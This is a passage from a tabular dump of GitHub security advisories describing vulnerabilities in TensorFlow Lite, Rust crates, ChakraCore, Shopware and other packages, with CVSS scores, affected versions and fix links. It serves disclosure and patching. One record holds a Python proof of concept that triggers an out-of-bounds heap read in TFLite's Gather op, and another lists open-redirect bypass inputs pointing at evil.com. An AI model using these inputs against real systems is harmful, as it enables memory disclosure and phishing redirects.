function](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/kernel_util.cc#L115-L119) can return a null pointer but `GetTensorData` assumes that the argument is always a valid tensor. + +```cc +TfLiteTensor* GetVariableInput(TfLiteContext* context, const TfLiteNode* node, + int index) { + TfLiteTensor* tensor = GetMutableInput(context, node, index); + return tensor->is_variable ? tensor : nullptr; +} +``` + +Furthermore, because `GetVariableInput` calls [`GetMutableInput`](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/kernel_util.cc#L82-L90) which might return `nullptr`, the `tensor->is_variable` expression can also trigger a null pointer exception. + +### Patches +We have patched the issue in GitHub commit [5b048e87e4e55990dae6b547add4dae59f4e1c76](https://github.com/tensorflow/tensorflow/commit/5b048e87e4e55990dae6b547add4dae59f4e1c76). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7xwj-5r4v-429p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37681'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5b048e87e4e55990dae6b547add4dae59f4e1c76'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T16:30:14Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-vpc2-7xmf-ppmf,2021-07-29T20:39:17Z,2021-08-02T17:26:11Z,,['CVE-2020-17048'],Out-of-bounds Write in ChakraCore,Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17054.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.23'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17048'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6528'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6528/commits/90e222e9a9ba64bd808666f44e6a0913d6318f78'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17048'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T19:13:22Z', 'nvd_published_at': '2020-11-11T07:15:00Z'}" +1.4.0,GHSA-ppj3-7jw3-8vc4,2021-08-19T20:53:30Z,2021-08-25T20:49:35Z,,['CVE-2020-35910'],Data races in lock_api,An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedMutexGuard unsoundness.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lock_api'}, 'ecosystem_specific': {'affected_functions': ['lock_api::MappedMutexGuard']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35910'}, {'type': 'WEB', 'url': 'https://github.com/Amanieu/parking_lot/pull/262'}, {'type': 'PACKAGE', 'url': 'https://github.com/Amanieu/parking_lot'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:53:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-458v-4hrf-g3m4,2021-08-24T17:42:57Z,2021-08-25T20:50:37Z,,['CVE-2020-35920'],socket2 invalidly assumes the memory layout of std::net::SocketAddr,"The socket2 crate has assumed `std::net::SocketAddrV4` and `std::net::SocketAddrV6` have the same memory layout as the system C representation `sockaddr`. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'socket2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.16'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'net2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35920'}, {'type': 'WEB', 'url': 'https://github.com/deprecrated/net2-rs/issues/105'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/socket2-rs/issues/119'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/socket2-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0078.html'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0079.html'}]","{'cwe_ids': ['CWE-188'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:53:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-5xg3-j2j6-rcx4,2021-09-09T16:46:42Z,2021-08-25T21:01:39Z,,['CVE-2021-36376'],Relative Path Traversal in git-delta,git-delta before 0.8.3 on Windows resolves an executable's pathname as a relative path from the current directory.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'git-delta'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36376'}, {'type': 'WEB', 'url': 'https://github.com/dandavison/delta/commit/f01846bd443aaf92fdd5ac20f461beac3f6ee3fd'}, {'type': 'PACKAGE', 'url': 'https://github.com/dandavison/delta'}, {'type': 'WEB', 'url': 'https://github.com/dandavison/delta/releases/tag/0.8.3'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0105.html'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/54'}]","{'cwe_ids': ['CWE-23', 'CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T19:06:14Z', 'nvd_published_at': '2021-07-13T13:15:00Z'}" +1.4.0,GHSA-4c4g-crqm-xrxw,2021-08-24T16:41:39Z,2021-08-25T14:40:32Z,,['CVE-2021-37682'],Use of unitialized value in TFLite,"### Impact +All TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200): + +```cc + const auto* affine_quantization = + reinterpret_cast( + filter->quantization.params); +``` + +The issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code. + +### Patches +We have patched the issue in GitHub commits [537bc7c723439b9194a358f64d871dd326c18887](https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887), +[4a91f2069f7145aab6ba2d8cfe41be8a110c18a5](https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5) and [8933b8a21280696ab119b63263babdb54c298538](https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4c4g-crqm-xrxw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37682'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-908'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T16:41:39Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-hhw2-pqhf-vmx2,2021-08-19T20:53:53Z,2021-08-25T20:49:09Z,,['CVE-2020-35898'],Use after free in actix-utils,An issue was discovered in the actix-utils crate before 2.0.0 for Rust. The Cell implementation allows obtaining more than one mutable reference to the same data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'actix-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35898'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-net/issues/160'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-net'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0045.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:53:53Z', 'nvd_published_at': None}" +1.4.0,GHSA-c9h5-hf8r-m97x,2021-08-19T21:18:24Z,2021-08-25T20:47:36Z,,['CVE-2020-35864'],Dangling reference in flatbuffers,An issue was discovered in the flatbuffers crate through 2020-04-11 for Rust. read_scalar (and read_scalar_at) can transmute values without unsafe blocks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'flatbuffers'}, 'ecosystem_specific': {'affected_functions': ['flatbuffers::read_scalar', 'flatbuffers::read_scalar_at']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35864'}, {'type': 'WEB', 'url': 'https://github.com/google/flatbuffers/issues/5825'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/flatbuffers'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0009.html'}]","{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-p5w9-856p-8q4g,2021-08-24T17:42:08Z,2021-08-25T21:00:23Z,2021-08-24T17:42:08Z,[],Assumed memory layout of std::net::SocketAddr,"The [`socket2`](https://crates.io/crates/socket2) crate has assumed `std::net::SocketAddrV4` +and `std::net::SocketAddrV6` have the same memory layout as the system C representation +`sockaddr`. It has simply casted the pointers to convert the socket addresses to the +system representation. The standard library does not say anything about the memory +layout, and this will cause invalid memory access if the standard library +changes the implementation. No warnings or errors will be emitted once the +change happens. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'socket2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-lang/socket2-rs/issues/119'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/socket2-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0079.html'}]","{'cwe_ids': ['CWE-824'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T17:25:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-jwf9-w5xm-f437,2021-08-24T17:49:13Z,2021-08-25T14:40:02Z,,['CVE-2021-37687'],Heap OOB in TFLite's `Gather*` implementations,"### Impact +TFLite's [`GatherNd` implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather_nd.cc#L124) does not support negative indices but there are no checks for this situation. + +Hence, an attacker can read arbitrary data from the heap by carefully crafting a model with negative values in `indices`. + +Similar issue exists in [`Gather` implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather.cc). + +```python +import tensorflow as tf +import numpy as np +tf.compat.v1.disable_v2_behavior() + +params = tf.compat.v1.placeholder(name=""params"", dtype=tf.int64, shape=(1,)) +indices = tf.compat.v1.placeholder(name=""indices"", dtype=tf.int64, shape=()) + +out = tf.gather(params, indices, name='out') + +with tf.compat.v1.Session() as sess: + converter = tf.compat.v1.lite.TFLiteConverter.from_session(sess, [params, indices], [out]) + tflite_model = converter.convert() + +interpreter = tf.lite.Interpreter(model_content=tflite_model) +interpreter.allocate_tensors() + +input_details = interpreter.get_input_details() +output_details = interpreter.get_output_details() + +params_data = np.reshape(np.array([1], dtype=np.int64), newshape=(1,)) +indices_data = np.reshape(np.array(-10, dtype=np.int64), newshape=()) +interpreter.set_tensor(input_details[0]['index'], params_data) +interpreter.set_tensor(input_details[1]['index'], indices_data) + +interpreter.invoke() +``` + +### Patches +We have patched the issue in GitHub commits [bb6a0383ed553c286f87ca88c207f6774d5c4a8f](https://github.com/tensorflow/tensorflow/commit/bb6a0383ed553c286f87ca88c207f6774d5c4a8f) and [eb921122119a6b6e470ee98b89e65d721663179d](https://github.com/tensorflow/tensorflow/commit/eb921122119a6b6e470ee98b89e65d721663179d). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jwf9-w5xm-f437'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37687'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/bb6a0383ed553c286f87ca88c207f6774d5c4a8f'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/eb921122119a6b6e470ee98b89e65d721663179d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:49:13Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-2r6q-6c8c-g762,2021-08-18T20:21:02Z,2021-08-25T20:58:03Z,,['CVE-2020-36456'],Data races in toolshed,"An issue was discovered in the toolshed crate through 2020-11-15 for Rust. In CopyCell, the Send trait lacks bounds on the contained type.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'toolshed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36456'}, {'type': 'WEB', 'url': 'https://github.com/ratel-rust/toolshed/issues/12'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratel-rust/toolshed'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0136.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:20:49Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-j79j-cx3h-g27h,2021-08-19T21:07:57Z,2021-08-25T20:48:02Z,,['CVE-2020-35881'],Out of bounds write in traitobject,"An issue was discovered in the traitobject crate through 2020-06-01 for Rust. It has false expectations about fat pointers, possibly causing memory corruption in, for example, Rust 2.x.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'traitobject'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35881'}, {'type': 'WEB', 'url': 'https://github.com/reem/rust-traitobject/issues/7'}, {'type': 'PACKAGE', 'url': 'https://github.com/reem/rust-traitobject'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0027.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:07:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-54gp-qff8-946c,2021-08-26T19:36:36Z,2021-08-30T16:14:19Z,,['CVE-2021-37709'],Insecure direct object reference of log files of the Import/Export feature,"### Impact +Insecure direct object reference of log files of the Import/Export feature + +### Patches +We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-54gp-qff8-946c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37709'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/a9f52abb6eb503654c492b6b2076f8d924831fec'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-532', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:36:36Z', 'nvd_published_at': '2021-08-16T22:15:00Z'}" +1.4.0,GHSA-5rrv-m36h-qwf8,2023-06-13T16:55:57Z,2021-08-25T20:44:40Z,,['CVE-2019-16140'],Use-after-free in chttp,"The From implementation for Vec was not properly implemented, returning a vector backed by freed memory. This could lead to memory corruption or be exploited to cause undefined behavior. + +A fix was published in version 0.1.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'chttp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.1'}, {'fixed': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16140'}, {'type': 'WEB', 'url': 'https://github.com/sagebind/isahc/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/sagebind/chttp'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0016.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-4298-89hc-6rfv,2023-09-01T21:51:44Z,2021-08-09T20:44:32Z,,['CVE-2021-23401'],Open Redirect in Flask-User,"This affects all versions of package Flask-User. When using the `make_safe_url` function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple backslashes such as `/////evil.com/path` or `\\\evil.com/path`. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using `autocorrect_location_header=False`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-User'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23401'}, {'type': 'PACKAGE', 'url': 'https://github.com/lingthio/Flask-User'}, {'type': 'WEB', 'url': 'https://github.com/lingthio/Flask-User/blob/master/flask_user/user_manager__utils.py'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-FLASKUSER-1293188'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T15:45:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-vc5p-j8vw-mc6x,2023-04-03T19:40:38Z,2021-08-25T21:01:47Z,,['CVE-2021-31155'],Permissions bypass in pleaser,Failure to normalize the umask in pleaser before 0.4.0 allows a local attacker to gain full root privileges if they are allowed to execute at least one command.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pleaser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31155'}, {'type': 'WEB', 'url': 'https://crates.io/crates/pleaser'}, {'type': 'WEB', 'url': 'https://gitlab.com/edneville/please'}, {'type': 'WEB', 'url': 'https://gitlab.com/edneville/please/-/tree/master/src/bin'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0101.html'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2021/05/18/1'}]","{'cwe_ids': ['CWE-269', 'CWE-279'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:29:53Z', 'nvd_published_at': '2021-05-27T13:15:00Z'}" +1.4.0,GHSA-w9r2-qrpm-4rmj,2023-01-24T19:02:15Z,2021-08-25T20:56:59Z,,['CVE-2020-36470'],Data race in disrustor,An issue was discovered in the disrustor crate through 2020-12-17 for Rust. RingBuffer doe not properly limit the number of mutable references.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'disrustor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36470'}, {'type': 'WEB', 'url': 'https://github.com/sklose/disrustor/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/sklose/disrustor/commit/0be7aed40adbac51a50a3b95c815349a40d79ca6'}, {'type': 'PACKAGE', 'url': 'https://github.com/sklose/disrustor'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0150.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:36:20Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-5hpj-m323-cphm,2021-08-19T17:15:33Z,2021-08-25T20:54:12Z,,['CVE-2021-29940'],Double free in through,An issue was discovered in the through crate through 2021-02-18 for Rust. There is a double free (in through and through_and) upon a panic of the map function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'through'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29940'}, {'type': 'WEB', 'url': 'https://github.com/gretchenfrage/through/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/gretchenfrage/through'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0049.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:15:33Z', 'nvd_published_at': None}" +1.4.0,GHSA-qgwf-r2jj-2ccv,2021-08-18T21:16:38Z,2021-08-25T20:56:09Z,,['CVE-2020-36464'],Use after free in heapless,An issue was discovered in the heapless crate before 0.6.1 for Rust. The IntoIter Clone implementation clones an entire underlying Vec without considering whether it has already been partially consumed.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'heapless'}, 'ecosystem_specific': {'affected_functions': ['heapless::vec::IntoIter::clone']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36464'}, {'type': 'WEB', 'url': 'https://github.com/japaric/heapless/issues/181'}, {'type': 'PACKAGE', 'url': 'https://github.com/japaric/heapless'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0145.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:16:38Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" 